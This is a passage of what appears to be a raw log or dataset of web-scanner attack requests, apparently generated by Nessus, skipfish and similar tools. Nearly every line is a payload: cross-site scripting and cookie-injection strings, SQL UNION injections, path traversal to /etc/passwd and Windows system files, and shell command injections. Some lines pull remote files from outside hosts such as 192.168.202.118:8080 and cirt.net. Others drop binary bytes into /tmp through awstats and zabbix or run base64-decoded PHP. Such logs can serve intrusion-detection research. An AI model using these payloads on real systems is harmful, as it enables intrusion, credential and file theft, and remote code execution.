content=\"testlwwz=718\">\n/servlet/org.apache.catalina.containerservlet/<script>alert(document.domain)</script>\n/javascript/admin.exe\n/javascript/received.exe\n/cacti/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/search.jsp?q=%\"<script>alert(1331904660)</script>\n/weq93ppb.asp?<script>cross_site_scripting.nasl</script>\n/scripts/fgos1sb1c1tr.inc\n/fmnveedu.jspa?<script>document.cookie=\"testgfbr=7014;\"</script>\n/zv8tv7h8.cfm?<script>document.cookie=\"testcqwz=9752;\"</script>\n/n9xlumt5.cfc?<script>cross_site_scripting.nasl</script>\n/subscriptions.bak\n/help.php?q='uname >q38575663 #\n/cgi-home/gw5/gwweb.exe?help=bad-request\n/uc3w3bdi.fts?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/gvx7m5ti.kspx?<script>document.cookie=\"testwldz=3506;\"</script>\n/search.jsp?q=%\"<script>alert(1332009303)</script>\n/javascript/amazon.exe\n/en-us/ddoworrl.php3?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/u95h6ymu.exe?<script>document.cookie=\"testkhwc=4028;\"</script>\n/top.php?stuff=\"\\x0ddel q75872817 #\n/scripts/tinfo.php?id=1332010394\n/main.php?logout=';uname >q59144751 #\n/8x6w469u.php3?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n\\\\../../../../boot.ini% ../\n/top.php?stuff=\"&ping -w 9000 -n 1 1.2.3.4&rem \n/forum_professionnel.asp?n=`/etc/passwd`|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;`&#039;.\n/phpmyadmin/.passwd\n//<body><script src=http://www.example.com/test?rnd=q32317269></script>\n/javascript/footers.exe\n/apavxugx.asp?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/en-us/n9xlumt5.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/examples/jsp/colors/shoutbox.php?conf=../\n/examples/jsp/error/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/javascript/msft.exe\n/g3w7y7u5.htm?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/bin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"&del;q83399542&rem;\n/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/scripts/secure/dashboard.jspa\n/fnwhrxyd.php3?<script>cross_site_scripting.nasl</script>\n/final isp position description/\n/top.php?stuff=\"\\x0dsleep\\x0911\\x09#\n/i2n4v4rl.jsp?<script>cross_site_scripting.nasl</script>\n/en-us/account/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/help.php?q=\";uname >q19897274 #\n/javascript/.htpasswd.sfish/`true`\n/index.php?id='union/**/select/**/0,0,1037776575,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=q63867595\n/javascript/.passwd.xls\n/scripts/index.php?id='union/**/select/**/0,0,907033072,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/jsp2/el/sources/functions.php?root_path=/etc/passwd\\x00\n/top.php?stuff=\"uname\\x09>q89765477\\x09#\n/examples/jsp/error/catalog.php?action=category_show&id='\n/d765w06j.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&del\\x0bq26467745&rem\\x0b\n/en-us/h5sc3gxy.kspx?<script>cross_site_scripting.nasl</script>\n/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331909442.php.\n/zuihld5m.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/w4996nr0.cfm?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/cal/man-cgi?section=0&topic=ls;id\n/help.php?q=\\x0duname\\x09>q95281946\\x09#\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908727\n/recordings/mapserv.exe?map=mapserver_detect.nasl.map\n/index.php?req=<script>alert('wvs-xss-magic-string-411545577486')</script>submit=submit\n/cgi-bin/msmmask.exe\n/h4bi26jd.jspa?<script>document.cookie=\"testhrzx=1150;\"</script>\n/qhvu0pdg.pl?<script>document.cookie=\"testchuc=2100;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/ysytjpdzlh0;'); function v\n/j4oqyvga.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/search.jsp?q=%\"<script>alert(1331904373)</script>\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il?\n/main.php?stuff=\"&rm,q14633268&rem,\n/examples/jsp/checkbox/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/examples/jsp/error/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/iissamples/issamples/winmsdp.exe\n/phpmyadmin/install.php?newlang=../../cpg_error.log\\x00\n/scripts/search.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl?\n/manager/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/examples/jsp/jsp2/elsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/prescriptionrefill/\n/main.php?stuff=\"uname\\x09#\n/it won't be christmas without you/\n/cgi-win/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/javascript/multimedia.exe\n/cgi-bin/index.php?id='union/**/select/**/0,0,1409137117,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/ui/login?user=nessus-1331918954\n/main.php?logout=\"ver >q61955456&rem \n/ewc3rz1l.html?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/help.php?q=\"\\x0arm\\x09q43182957\\x09#\n/scripts/vhost.php?action=logout&time=1332010196\n/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,261058722,0,0,0,0,0--\n/examples/jsp/jsp2/jspx/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/h21y8w52.x?<script>cross_site_scripting.nasl</script>\n/cgi-bin/.cobalt/alert/service.cgi?service=<img src=javascript:alert('vulnerable')>\n/scripts/wd7crx47eaml.html\n/bl8sefdm.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/escript_examples/\n/cacti/language.php?data_dir=/etc/passwd\\x00\n/help.php?q=\"\\x0adel q34395972 #\n/antispam/listdel?file=blacklist&name=b<script>alert('vulnerable')</script>&startline=0\n/l4fz1dqw.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/jw64yq8u.pl?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/examples/jsp/num/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/cgi-bin/index.php?id=823dwrvmfh'\n/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/r3le3om5.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/apavxugx.aspx?<script>document.cookie=\"testdnbh=5237;\"</script>\n/javascript/document.lib\n/javascript/htdoc.exe\n/passwd_files/\n//</p><body><script/src=\"http://www.example.com/test?rnd=q29464737\"></script><p>\n/help.php?q=;sleep 11 #\n/cgi_bin/listrec.pl?app=qmh-news&template=;ls /etc|\n/en-us/<script>document.cookie=\"testnvxc=4301;\"</script>\n/job_description/\n/javascript/fetch.exe\n/scgi-bin/windmail.exe\n/scripts/home/search.asp?nchannel='1\n/mv8wxfy9.exe?<script>document.cookie=\"testrhbc=8184;\"</script>\n/examples/jsp/jsp2/el/main.php?g2_itemid=../../../../../license\\x00\n/submitscript/\n/1r8cfrlf.cfc?<script>document.cookie=\"testydan=5106;\"</script>\n/examples/jsp/jsp2/el/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/jw64yq8u.jspa?<script>document.cookie=\"testylfu=1313;\"</script>\n/examples/jsp/jsp2/jspx/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/error/\\..\\..\\..\\..\\winnt\\win.ini\n/top.php?stuff=\";sleep 10 #\n/../.sln\n/scripts-util/\n/help.php?q='\\x0adel q22265597 #\n/scripts/rpc.php?cmd=display_get_requesters&id=1\n/o6ebbirj.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/index.php?template=../../../loudblog/custom/config.php\\x00\n/fcgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/scripts/gw5/gwweb.exe?help=bad-request\n/javascript/maven.exe\n/main.php?stuff=rm;q53449996&rem;\n/carisoprodol-script/\n/viewpage.php?file=/etc/passwd\n/o6ebbirj.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/scripts/admin.pl?path=bin/mozilla&action=list_users\n/i686v90l.aspx?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/phpmyadmin/forum_2.php?msg=10&return=<script>foo</script>\n/help.php?q=\"|ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/scripts/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd\n/../.sql\n/ghswfouu.html?<script>document.cookie=\"testsqmm=5713;\"</script>\n/scripts/cleartrust/ct_logon.asp?ctloginerrormsg=<script>alert(1)</script>\n/manager/viewpage.php?file=/etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+61+c3+60+52+53+33+c0+e8+0a+00+00+00+5b+5a+03+d8+2b+d0+75+ef+61+c3++>>esbq\n/main.php?stuff=\"|ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/javascript/shadow.exe\n/examples/jsp/cal/remindpasswd\n/technology-description/\n/index.php?op=default&date=200607' union select 1,898491611,1,1,1,1,1,1,1,1--&blogid=1\n/recordings/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/gvx7m5ti.mscgi?<script>document.cookie=\"testwldz=3506;\"</script>\n/ju0u7kfo.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/examples/servlets/servlet/texis.exe/?-dump\n/examples/servlets/servlet/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=ver >q22882938&rem \n/opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/ewc3rz1l.mscgi?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/tuwjta1w.php3?<script>document.cookie=\"testpokn=7494;\"</script>\n/en-us/account/file.php?path=/etc/passwd\\x00\n/examples/jsp/jsp2/el/search/show.pl?url=file:/etc/passwd\n/help.php?q=\"del,q74835818&rem,\n/javascript/modify.exe\n/hrttz9fj.nsf?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/xvvpghsokp0+>+/dev/null+&').\"]=1\n/top.php?stuff=\"\\x0asleep 11 #\n/cacti/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/h5sc3gxy.cgi?<script>cross_site_scripting.nasl</script>\n/o35zot2r.x?<script>cross_site_scripting.nasl</script>\n/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/ghl9il?\n/help.php?q=;rm q31144684 #\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--\n/examples/jsp/num/phptonuke.php?filnavn=/etc/passwd\n/top.php?stuff=\"&ver&rem\\x0c\n/d44uk9h2.x?<script>document.cookie=\"testmybc=2088;\"</script>\n/admin-serv/tasks/configuration/viewlog?file=passwd&num=5000&str=&directories=admin-serv/logs/../../../../../../etc&id=admin-serv\n/cacti/listrec.pl?app=qmh-news&template=;ls /etc|\n/<script>document.cookie=\"testvlau=8517;\"</script>\n/j4oqyvga.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/calendar_admin.pl?config=|cat /etc/passwd|\n/8x6w469u.pl?<script>document.cookie=\"testgfjr=1286;\"</script>\n/help.php?q='\\x0ddel q49373567 #\n/cgi-bin/gw5/gwweb.exe?htmlver=aaa&get-context\n/u8yiqilu.jsp?<script>document.cookie=\"testswjp=6010;\"</script>\n/javascript/computer.exe\n/help.php?q=\"|ping,-w,9000,-n,1,4.3.2.1|rem,\n/index.php?dir=<script>alert(412105577658)</script>\n/top.php?stuff=';uname\\x09#\n/help.php?q='\\x0ddel\\x09q63353886\\x09#\n/d5a5renl.aspx?<script>cross_site_scripting.nasl</script>\n/ju0u7kfo.cfm?<script>cross_site_scripting.nasl</script>\n/kb.php?category_id=xxl><script>alert(412625577808)</script>\n/help.php?q=\"ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/main.php?stuff=\"uname\\x09>q91227717\\x09#\n/examples/jsp/sessions/download.php?language=/etc/passwd\\x00\n/confirmunsubscription.php?output=http://192.168.202.118:8080/ghl9il?\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+6f+61+64+4c+69+62+72+61+72+79+41+00+00+00+00+47+65+74+50+72+6f+63+41+64+64++>>esbq\n/ao22ww7y.cfc?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/index.php?in=song&term=<script>alert(\"411756083444\");</script>&action=search&start=0\n/top.php?stuff=\"\\x0auname #\n/jackrabbit/search.jsp?q=%\"<script>alert(1331904373)</script>\n/index.php?id='union/**/select/**/0,0,2115200900,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/ows-bin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/cgi-sys/r.cgi?file=../../../../../../../../../../etc/passwd\n/0rufe52p.jsp?<script>cross_site_scripting.nasl</script>\n/scripts/starnet/addons/slideshow_full.php?album_name='648730541\n/cgi-914/.passwd\n/cgi-local/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/main.php?stuff=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/scripts/news.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl?\n/scripts/b0j2ijssh6cu.cfm\n/servlet/msgpage?action=test&msg=<script>alert('vulnerable')</script>\n/bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/javascript/htpasswd.cfg\n/examples/jsp/num/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/top.php?stuff=';rm\\x09q97745414\\x09#\n/examples/jsp/checkbox/install.php?newlang=../../cpg_error.log\\x00\n/help.php?q=\"del q26428197&rem \n/6wb70v0b.aspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"del\\x09q67284925&rem\\x09\n/edittag/edittag.cgi?file=/../../../../../etc/passwd\n/examples/jsp/jsp2/el/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/phpmyadmin/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/scripts/t769qwej0llr.pl\n/scripts/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/\n/promo-transcript7/\n/javascript/removals.exe\n/mpcgi/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/quagynka.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ping;-w;7000;-n;1;1.2.3.4|rem;\n/examples/jsp/cal/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/javascript/.passwd.class\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/frznctvhi0i5??\n/jdx255ea.nsf?<script>document.cookie=\"testziyq=5055;\"</script>\n/?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/help.php?q=\"\\x0ddel\\x09q76412123\\x09#\n/examples/servlets/servlet/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/o35zot2r.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>\n/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\\x00\n/n9xlumt5.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping,-w,11000,-n,1,4.3.2.1&rem,\n/metranscript/\n/fa8p8lr8.nsf?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/examples/jsp/cal/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/?<script>document.cookie=\"testtfvh=2141;\"</script>\n/hosting-scripts/\n/jackin' pop/\n/ygkjkngd.cfm?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/main.php?stuff=\"&uname >q23549573 #\n/cgis/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/_vti_bin/_vti_adm/admin.exe\n/javascript/htpasswd.rb\n/main.php?logout=';rm q59144751 #\n/en-us/account/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/byrg33fw.aspx?<script>document.cookie=\"testexuu=5340;\"</script>\n/javascript/.passwd.sh\n/l13b77e5.pl?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/d44uk9h2.aspx?<script>document.cookie=\"testmybc=2088;\"</script>\n/scripts/session/login.php\n/top.php?stuff='\\x0drm\\x09q15742122\\x09#\n/help.php?q=\"ver,>q69289112&rem,\n/javascript/close.exe\n/<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/dailies biblical scripture v1/\n/viagra-prescriptions/\n/y8pmygrp.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vmi8bb12.cfc?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/h21y8w52.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/news/include/createdb.php?langfile;=http://cirt.net/rfiinc.txt??\n/javascript/.passwd.key\n/archive.php?scriptpath=http://192.168.202.96:8080/swgnhpydbq0t??\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/606wkcop.htm?<script>cross_site_scripting.nasl</script>\n/mv8wxfy9.idc?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/cacti/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/manager/print.php?what=article&id='\n/cgi-exe/gw5/gwweb.exe?htmlver=aaa&get-context\n/examples/jsp/jsp2/jspx/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/cgi-bin/index.php?id=kis0atfdu6'\n/scripts/test-cgi?/*\n/quagynka.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/fabric.exe\n/help.php?q=\"ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/scripts/k0pxpjgnimox.html\n/top.php?stuff=\"\\x0duname\\x09>q41641295\\x09#\n/eg2u8pbv.mscgi?<script>cross_site_scripting.nasl</script>\n/6wb70v0b.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/yfmo7jpwvpv1.php3\n/169okeyj.asp?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/javascript/.htaccess.sfish/'`uname`'\n/scheme-description/\n/scripts/eezuu7xc7ge3.cgi\n/6wb70v0b.dll?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/scripts/texis.exe/junk\n/fc9t54l7.idc?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/main.php?logout='\\x0dsleep\\x099\\x09#\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini\n/t3af3tdz.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m2fpztty.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='uname #\n/scripts/wd7crx47eaml.sh\n/examples/jsp/colors/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/javascript/document.cpp\n/scripts/vzdybnanqpc3.pl\n/examples/jsp/jsp2/jspx/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/bxnyrhmh.cgi?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/code/inc_header.php?gtopnombre=\"><script>alert('wvs-xss-magic-string-411675577528');</script><test=\"\n/cgi-bin/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/yef5f3d5.jspa?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/en-us/33y9gcqq.cgi?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/zln2hm2z.dll?<script>document.cookie=\"testblcp=8120;\"</script>\n/examples/jsp/colors/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/igtf0zon.php?<script>cross_site_scripting.nasl</script>\n/ovcgi/ovalarm.exe?ovabverbose=1\n/en-us/fo564rei.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vmi8bb12.fts?<script>document.cookie=\"testlerc=2575;\"</script>\n/examples/jsp/checkbox/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/eg2u8pbv.html?<script>cross_site_scripting.nasl</script>\n/en-us/ddoworrl.htm?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/zuihld5m.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/l13b77e5.mscgi?<script>document.cookie=\"testjvvf=7721;\"</script>\n/javascript/iisadmin.exe\n/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd\n/htbin/r.cgi?file=../../../../../../../../../../etc/passwd\n/examples/jsp/colors/javascript.php?abs_path=/etc/passwd\\x00\n/subscriptions.log\n/recordings/index.php?search=<script>foo</script>\n/cgi-exe/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/main.php?logout=ping;-w;11000;-n;1;1.2.3.4&rem;\n/<script>document.cookie=\"testgjbe=8505;\"</script>\n/miz4r5hz.cfc?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/jsp2/el/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/news/include/createdb.php?langfile;=http://192.168.202.118:8080/ghl9il??\n/1qwv2p5p.asp?<script>document.cookie=\"testvqcy=252;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=1'\n/examples/jsp/colors/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/en-us/dda2qr7j.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/add_url.htm?node=<script>alert('xss')</script>\n/domainfiles/*//../../../../../../../../../../etc/passwd\n/bl8sefdm.jsp?<script>cross_site_scripting.nasl</script>\n/j2kdmfw4.nsf?<script>cross_site_scripting.nasl</script>\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/phpmyadmin/documentation.html?phpmyadmin=/\\../\\../\\../\\../\\../\\../\\../etc/passwd\n/javascript/ini.exe\n/examples/jsp/num/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/vsnlklmgzu0;echo|awstats235001.txt\n/scripts/1331909165-ror_session_fixation.nasl\n/help.php?q=\"\\x0adel q73214822 #\n/javascript/document.inc\n/cgi-bin/20review.asp?productcode='\n/b4vng02k.jsp?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/examples/jsp/sessions/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/gy23xnjq.x?<script>cross_site_scripting.nasl</script>\n/en-us/esmozg5d.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=<!--\n/help.php?q=\"|ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/scripts/lpzj75ztw9lb.inc\n/examples/jsp/jsp2/jspx/search.pl?form=../../../../../../etc/passwd\\x00\n/help.php?q=\"&del,q25917292&rem,\n/examples/jsp/checkbox/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/bdaysubscriptions/\n/if69ddo1.cfm?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/top.php?stuff='rm\\x09q19246858\\x09#\n/cgi-bin/sendcard.php?view=1&id='sendcard_sql.nasl\n/8t9v8k7x.dll?<script>document.cookie=\"testhvje=9403;\"</script>\n/passwd.txt\n/passwd/\n/_mem_bin/formslogin.asp?\\\"><script>alert('vulnerable')</script>\n/phpmyadmin/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/_vti_bin/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/ny1b3qq4.php?<script>cross_site_scripting.nasl</script>\n/pxagj7n7.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=del;q42148333&rem;\n/javascript/.htaccess.sfish/-->\">'>'\"<sfi000014v868621>\n/phpmyadmin/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd\n/phpmyadmin/admin/admin.php?sid=0'\n/../../../../winnt/repair/sam._\n/cgi-bin/cart.pl?db='\n/ows-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/scripts/browse_blogs.php\n/5o9zq43e.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/\"consumer+information\"/\n/nsn/..\\util/dsbrowse.bas\n/top.php?stuff='&uname >q61677415 #\n/eg2u8pbv.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/a0imiuf1.jspa?<script>document.cookie=\"testxqrn=4654;\"</script>\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331923195')</script>\n/manager/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/hlgncmwqwx0;').\"]=1\n/eei78ore.mscgi?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/javascript/queue.exe\n/s7qus4g3.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=del;q53449996&rem;\n/ewc3rz1l.cgi?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/bn857frh.asp?<script>cross_site_scripting.nasl</script>\n/zqqemp6j.cfm?<script>cross_site_scripting.nasl</script>\n/cgi-sys/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/naviconapplescript20050412/\n/en-us/account/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/examples/jsp/error/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/t578vqea.fts?<script>document.cookie=\"testsory=7676;\"</script>\n/scripts/sawmillcl.exe?ho+{complete_version}\n/cgi-bin/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/javascript/affiliates.exe\n/ydexw8by.x?<script>document.cookie=\"testulex=4996;\"</script>\n/examples/jsp/num/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wpypq2jh]));die;/*\n/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/if69ddo1.fts?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/javascript/audio.exe\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+00+28+30+00+00+00+00++>>esbq\n/admin.php?\"><script>alert(409965565951)</script><\"\n/main.php?stuff='rm q94914736 #\n/examples/servlets/servlet/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/puttputtzoo.exe/\n/examples/jsp/jsp2/el/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/news.php?scriptpath=@rfiurl?scriptpath=@rfiurl?\n/5o9zq43e.jspa?<img 